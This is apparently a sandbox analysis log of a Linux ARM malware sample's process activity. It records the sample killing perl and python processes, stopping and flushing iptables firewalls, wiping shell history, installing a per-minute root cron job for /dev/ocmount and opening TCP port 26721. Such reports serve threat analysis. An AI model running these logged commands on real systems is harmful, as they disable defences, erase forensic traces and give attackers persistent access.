                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:00
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "pkill -9 perl"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:00
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:00
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/pkill
                                                                    Arguments:pkill -9 perl
                                                                    File size:30968 bytes
                                                                    MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:03
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:03
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "pkill -9 python"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:03
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:03
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/pkill
                                                                    Arguments:pkill -9 python
                                                                    File size:30968 bytes
                                                                    MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:05
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:05
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "service iptables stop"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:05
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:05
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:service iptables stop
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:05
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:05
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/basename
                                                                    Arguments:basename /usr/sbin/service
                                                                    File size:39256 bytes
                                                                    MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:05
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:05
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/basename
                                                                    Arguments:basename /usr/sbin/service
                                                                    File size:39256 bytes
                                                                    MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:05
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:05
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/systemctl
                                                                    Arguments:systemctl --quiet is-active multi-user.target
                                                                    File size:996584 bytes
                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:06
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:06
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:06
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/systemctl
                                                                    Arguments:systemctl list-unit-files --full --type=socket
                                                                    File size:996584 bytes
                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:06
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:06
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/sed
                                                                    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                    File size:121288 bytes
                                                                    MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/systemctl
                                                                    Arguments:systemctl stop iptables.service
                                                                    File size:996584 bytes
                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "/sbin/iptables -F; /sbin/iptables -X"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/sbin/iptables
                                                                    Arguments:/sbin/iptables -F
                                                                    File size:99296 bytes
                                                                    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/sbin/iptables
                                                                    Arguments:/sbin/iptables -X
                                                                    File size:99296 bytes
                                                                    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "service firewall stop"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:service firewall stop
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/basename
                                                                    Arguments:basename /usr/sbin/service
                                                                    File size:39256 bytes
                                                                    MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/basename
                                                                    Arguments:basename /usr/sbin/service
                                                                    File size:39256 bytes
                                                                    MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:07
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/systemctl
                                                                    Arguments:systemctl --quiet is-active multi-user.target
                                                                    File size:996584 bytes
                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:08
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:08
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:08
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/systemctl
                                                                    Arguments:systemctl list-unit-files --full --type=socket
                                                                    File size:996584 bytes
                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:08
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/service
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:08
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/sed
                                                                    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                    File size:121288 bytes
                                                                    MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/systemctl
                                                                    Arguments:systemctl stop firewall.service
                                                                    File size:996584 bytes
                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "history -c"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "rm -rf ~/.bash_history"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/rm
                                                                    Arguments:rm -rf /root/.bash_history
                                                                    File size:72056 bytes
                                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "history -w"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "chmod +x /dev/ocmount"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/chmod
                                                                    Arguments:chmod +x /dev/ocmount
                                                                    File size:63864 bytes
                                                                    MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c /dev/ocmount
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:10
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:20
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:20
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:20
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:20
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:20
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/iptables
                                                                    Arguments:iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                    File size:99296 bytes
                                                                    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/busybox
                                                                    Arguments:/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                    File size:2172376 bytes
                                                                    MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/bin/busybox
                                                                    Arguments:busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                    File size:2172376 bytes
                                                                    MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:20
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:20
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:20
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:19
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:19
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:19
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:19
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:19
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/usr/sbin/iptables
                                                                    Arguments:iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                    File size:99296 bytes
                                                                    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:20
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:20
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/busybox
                                                                    Arguments:/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
                                                                    File size:2172376 bytes
                                                                    MD5 hash:70584dffe9cb0309eb22ba78aa54bcdc

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/tmp/arm7.elf
                                                                    Arguments:-
                                                                    File size:4956856 bytes
                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:/bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
                                                                    Start date (UTC):06/10/2024
                                                                    Path:/bin/sh
                                                                    Arguments:-
                                                                    File size:129816 bytes
                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                    Chronological Activities


                                                                    General

                                                                    Start time (UTC):13:52:21
